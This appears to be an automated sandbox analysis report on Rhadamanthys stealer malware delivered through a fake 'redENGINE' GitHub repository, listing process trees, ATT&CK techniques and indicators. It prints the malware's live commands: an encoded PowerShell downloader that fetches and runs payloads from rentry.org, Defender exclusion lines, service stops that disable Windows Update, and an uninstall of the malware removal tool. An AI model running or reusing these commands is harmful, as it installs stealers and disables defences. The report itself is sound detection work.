rhadamanthys | hxxps://github[.]com/f4yd1C/redENGINE?tab=readme-ov-file

Analysis

max time kernel
133s
max time network
178s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
14-06-2024 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/f4yd1C/redENGINE?tab=readme-ov-file

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

4yyvaf3i.iyr2.exeadebj4ig.t3j2.exeavfexwas.ea22.exe

description pid process target process

PID 652 created 2820 652 4yyvaf3i.iyr2.exe sihost.exe
PID 3476 created 2820 3476 adebj4ig.t3j2.exe sihost.exe
PID 2656 created 2820 2656 avfexwas.ea22.exe sihost.exe

description	pid	process	target process
PID 652 created 2820	652	4yyvaf3i.iyr2.exe	sihost.exe
PID 3476 created 2820	3476	adebj4ig.t3j2.exe	sihost.exe
PID 2656 created 2820	2656	avfexwas.ea22.exe	sihost.exe

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
131	4184	powershell.exe
133	4184	powershell.exe
135	3976	powershell.exe
136	3976	powershell.exe
137	4508	powershell.exe
138	4508	powershell.exe
140	852	powershell.exe
141	1940	powershell.exe
142	852	powershell.exe
143	1940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2064 powershell.exe
5468 powershell.exe
4508 powershell.exe
1940 powershell.exe
852 powershell.exe
5204 powershell.exe
5876 powershell.exe
1528 powershell.exe
4184 powershell.exe
3976 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
2064	powershell.exe
5468	powershell.exe
4508	powershell.exe
1940	powershell.exe
852	powershell.exe
5204	powershell.exe
5876	powershell.exe
1528	powershell.exe
4184	powershell.exe
3976	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Loader.exeLoader.exeLoader.exeLoader.exeLoader.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Loader.exe

Executes dropped EXE 11 IoCs

Processes:

Loader.exeLoader.exe4yyvaf3i.iyr2.exe4yyvaf3i.iyr3.exeadebj4ig.t3j2.exeadebj4ig.t3j3.exeLoader.exeavfexwas.ea22.exeavfexwas.ea23.exeLoader.exeLoader.exe

pid	process
4556	Loader.exe
2516	Loader.exe
652	4yyvaf3i.iyr2.exe
2900	4yyvaf3i.iyr3.exe
3476	adebj4ig.t3j2.exe
452	adebj4ig.t3j3.exe
2544	Loader.exe
2656	avfexwas.ea22.exe
3064	avfexwas.ea23.exe
3732	Loader.exe
976	Loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 19 IoCs

Web Service

T1102

Processes:

flow	ioc
44	camo.githubusercontent.com
80	bitbucket.org
81	bitbucket.org
82	bitbucket.org
84	bitbucket.org
142	bitbucket.org
132	bitbucket.org
133	bitbucket.org
138	bitbucket.org
143	bitbucket.org
42	camo.githubusercontent.com
79	bitbucket.org
86	bitbucket.org
151	bitbucket.org
41	camo.githubusercontent.com
136	bitbucket.org
149	bitbucket.org
152	bitbucket.org
154	bitbucket.org

Drops file in System32 directory 3 IoCs

Processes:

4yyvaf3i.iyr3.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	4yyvaf3i.iyr3.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

4yyvaf3i.iyr3.exe

description pid process target process

PID 2900 set thread context of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe

description	pid	process	target process
PID 2900 set thread context of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe

Drops file in Program Files directory 2 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Loader\Loader.rar	msedge.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Loader\Password.txt	msedge.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5276 sc.exe
2544 sc.exe
3360 sc.exe
1136 sc.exe
1520 sc.exe
3940 sc.exe
5500 sc.exe
5324 sc.exe
5916 sc.exe
4824 sc.exe
4788 sc.exe
412 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

7zFM.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings 7zFM.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

3704 NOTEPAD.EXE

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

pid	process
5276	sc.exe
2544	sc.exe
3360	sc.exe
1136	sc.exe
1520	sc.exe
3940	sc.exe
5500	sc.exe
5324	sc.exe
5916	sc.exe
4824	sc.exe
4788	sc.exe
412	sc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	7zFM.exe

pid	process
3704	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

7zFM.exepowershell.exepowershell.exe4yyvaf3i.iyr2.exeadebj4ig.t3j2.exedialer.exepowershell.exeavfexwas.ea22.exedialer.exe4yyvaf3i.iyr3.exepowershell.exepowershell.exepowershell.exedialer.exe

pid	process
2968	7zFM.exe
2968	7zFM.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
3976	powershell.exe
3976	powershell.exe
3976	powershell.exe
652	4yyvaf3i.iyr2.exe
652	4yyvaf3i.iyr2.exe
3476	adebj4ig.t3j2.exe
3476	adebj4ig.t3j2.exe
3448	dialer.exe
3448	dialer.exe
3448	dialer.exe
3448	dialer.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
2656	avfexwas.ea22.exe
2656	avfexwas.ea22.exe
4824	dialer.exe
4824	dialer.exe
4824	dialer.exe
4824	dialer.exe
2900	4yyvaf3i.iyr3.exe
2064	powershell.exe
2064	powershell.exe
2064	powershell.exe
1940	powershell.exe
1940	powershell.exe
852	powershell.exe
852	powershell.exe
1940	powershell.exe
852	powershell.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2900	4yyvaf3i.iyr3.exe
2356	dialer.exe
2356	dialer.exe
2900	4yyvaf3i.iyr3.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe
2356	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

7zFM.exe7zFM.exe7zFM.exe

pid process

2968 7zFM.exe
2100 7zFM.exe
2568 7zFM.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

7zFM.exe7zFM.exe7zFM.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe4yyvaf3i.iyr3.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeRestorePrivilege	2968	7zFM.exe
Token: 35	2968	7zFM.exe
Token: SeSecurityPrivilege	2968	7zFM.exe
Token: SeSecurityPrivilege	2968	7zFM.exe
Token: SeRestorePrivilege	2100	7zFM.exe
Token: 35	2100	7zFM.exe
Token: SeRestorePrivilege	2568	7zFM.exe
Token: 35	2568	7zFM.exe
Token: SeSecurityPrivilege	2568	7zFM.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	2900	4yyvaf3i.iyr3.exe
Token: SeDebugPrivilege	2356	dialer.exe
Token: SeShutdownPrivilege	3432	powercfg.exe
Token: SeCreatePagefilePrivilege	3432	powercfg.exe
Token: SeShutdownPrivilege	3972	powercfg.exe
Token: SeCreatePagefilePrivilege	3972	powercfg.exe
Token: SeShutdownPrivilege	2672	powercfg.exe
Token: SeCreatePagefilePrivilege	2672	powercfg.exe
Token: SeShutdownPrivilege	3104	powercfg.exe
Token: SeCreatePagefilePrivilege	3104	powercfg.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

7zFM.exe7zFM.exe7zFM.exe

pid process

2968 7zFM.exe
2968 7zFM.exe
2968 7zFM.exe
2100 7zFM.exe
2568 7zFM.exe
2568 7zFM.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7zFM.exeLoader.exeLoader.exepowershell.exepowershell.exe4yyvaf3i.iyr2.exeadebj4ig.t3j2.exeLoader.exepowershell.exeavfexwas.ea22.exeLoader.exeLoader.exe4yyvaf3i.iyr3.execmd.exedialer.exe

description	pid	process	target process
PID 2968 wrote to memory of 3704	2968	7zFM.exe	NOTEPAD.EXE
PID 2968 wrote to memory of 3704	2968	7zFM.exe	NOTEPAD.EXE
PID 4556 wrote to memory of 4184	4556	Loader.exe	powershell.exe
PID 4556 wrote to memory of 4184	4556	Loader.exe	powershell.exe
PID 2516 wrote to memory of 3976	2516	Loader.exe	powershell.exe
PID 2516 wrote to memory of 3976	2516	Loader.exe	powershell.exe
PID 4184 wrote to memory of 652	4184	powershell.exe	4yyvaf3i.iyr2.exe
PID 4184 wrote to memory of 652	4184	powershell.exe	4yyvaf3i.iyr2.exe
PID 4184 wrote to memory of 652	4184	powershell.exe	4yyvaf3i.iyr2.exe
PID 4184 wrote to memory of 2900	4184	powershell.exe	4yyvaf3i.iyr3.exe
PID 4184 wrote to memory of 2900	4184	powershell.exe	4yyvaf3i.iyr3.exe
PID 3976 wrote to memory of 3476	3976	powershell.exe	adebj4ig.t3j2.exe
PID 3976 wrote to memory of 3476	3976	powershell.exe	adebj4ig.t3j2.exe
PID 3976 wrote to memory of 3476	3976	powershell.exe	adebj4ig.t3j2.exe
PID 3976 wrote to memory of 452	3976	powershell.exe	adebj4ig.t3j3.exe
PID 3976 wrote to memory of 452	3976	powershell.exe	adebj4ig.t3j3.exe
PID 652 wrote to memory of 3448	652	4yyvaf3i.iyr2.exe	dialer.exe
PID 652 wrote to memory of 3448	652	4yyvaf3i.iyr2.exe	dialer.exe
PID 652 wrote to memory of 3448	652	4yyvaf3i.iyr2.exe	dialer.exe
PID 652 wrote to memory of 3448	652	4yyvaf3i.iyr2.exe	dialer.exe
PID 652 wrote to memory of 3448	652	4yyvaf3i.iyr2.exe	dialer.exe
PID 3476 wrote to memory of 3864	3476	adebj4ig.t3j2.exe	dialer.exe
PID 3476 wrote to memory of 3864	3476	adebj4ig.t3j2.exe	dialer.exe
PID 3476 wrote to memory of 3864	3476	adebj4ig.t3j2.exe	dialer.exe
PID 3476 wrote to memory of 3864	3476	adebj4ig.t3j2.exe	dialer.exe
PID 3476 wrote to memory of 3864	3476	adebj4ig.t3j2.exe	dialer.exe
PID 2544 wrote to memory of 4508	2544	Loader.exe	powershell.exe
PID 2544 wrote to memory of 4508	2544	Loader.exe	powershell.exe
PID 4508 wrote to memory of 2656	4508	powershell.exe	avfexwas.ea22.exe
PID 4508 wrote to memory of 2656	4508	powershell.exe	avfexwas.ea22.exe
PID 4508 wrote to memory of 2656	4508	powershell.exe	avfexwas.ea22.exe
PID 4508 wrote to memory of 3064	4508	powershell.exe	avfexwas.ea23.exe
PID 4508 wrote to memory of 3064	4508	powershell.exe	avfexwas.ea23.exe
PID 2656 wrote to memory of 4824	2656	avfexwas.ea22.exe	dialer.exe
PID 2656 wrote to memory of 4824	2656	avfexwas.ea22.exe	dialer.exe
PID 2656 wrote to memory of 4824	2656	avfexwas.ea22.exe	dialer.exe
PID 2656 wrote to memory of 4824	2656	avfexwas.ea22.exe	dialer.exe
PID 2656 wrote to memory of 4824	2656	avfexwas.ea22.exe	dialer.exe
PID 3732 wrote to memory of 1940	3732	Loader.exe	powershell.exe
PID 3732 wrote to memory of 1940	3732	Loader.exe	powershell.exe
PID 976 wrote to memory of 852	976	Loader.exe	powershell.exe
PID 976 wrote to memory of 852	976	Loader.exe	powershell.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 4188 wrote to memory of 3300	4188	cmd.exe	wusa.exe
PID 4188 wrote to memory of 3300	4188	cmd.exe	wusa.exe
PID 2900 wrote to memory of 2356	2900	4yyvaf3i.iyr3.exe	dialer.exe
PID 2356 wrote to memory of 628	2356	dialer.exe	winlogon.exe
PID 2356 wrote to memory of 692	2356	dialer.exe	lsass.exe
PID 2356 wrote to memory of 956	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 336	2356	dialer.exe	dwm.exe
PID 2356 wrote to memory of 828	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1052	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1096	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1192	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1208	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1264	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1340	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1364	2356	dialer.exe	svchost.exe
PID 2356 wrote to memory of 1468	2356	dialer.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:336

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1192

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1468

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2820

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3448

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:3864

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:1088

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:4396

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:5376

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:1700

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
PID:5900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2440

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2084

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3176

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/f4yd1C/redENGINE?tab=readme-ov-file
2⤵
PID:1184

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\Loader.rar"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2100

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\Loader.rar"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2568

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184

C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exe
"C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:652

C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exe
"C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:3300

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:4824

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3360

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:1136

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:1520

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:4788

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:412

C:\Windows\system32\sc.exe
